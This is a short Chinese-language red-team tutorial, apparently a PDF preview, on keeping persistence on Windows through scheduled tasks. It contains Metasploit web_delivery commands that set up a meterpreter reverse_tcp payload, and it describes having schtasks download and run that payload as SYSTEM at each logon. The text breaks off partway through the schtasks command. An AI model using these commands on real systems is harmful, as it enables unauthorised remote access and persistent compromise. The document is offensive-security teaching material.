Window权限维持（二）：计划任务.pdfVIP

Windows操作系统提供了一个实用程序（schtasks.exe），使系统管理员能够在特定的日期和时间执

行程序或脚本。这种行为可作为一种持久性机制被redteam利用。通过计划任务执行持久性不需要管理

员权限，但如果已获得提升的权限，则允许进一步操作，例如在用户登录期间或在空闲状态期间执行任

务。

计划任务的持久化技术可以手动实现，也可以自动实现。有效负载可以从磁盘或远程位置执行，它们可

以是可执行文件、powershell脚本或scriptlet的形式。这被认为是一种旧的持久性技术，但是它仍然

可以在redteam场景中使用，并且由各种开源工具支持。Metasploit的web_delivery模块可用于托

管和生成各种格式的有效载荷。

useexploit/multi/script/web_delivery

setpayloadwindows/x64/meterpreter/reverse_tcp

setLHOST1

settarget5

exploit

在命令提示符下，“schtasks”可执行文件可用于创建计划任务，该任务将在每个Windows登录中以

SYSTEM的形式下载并执行基于PowerShell的有效负载。

schtasks/create/tn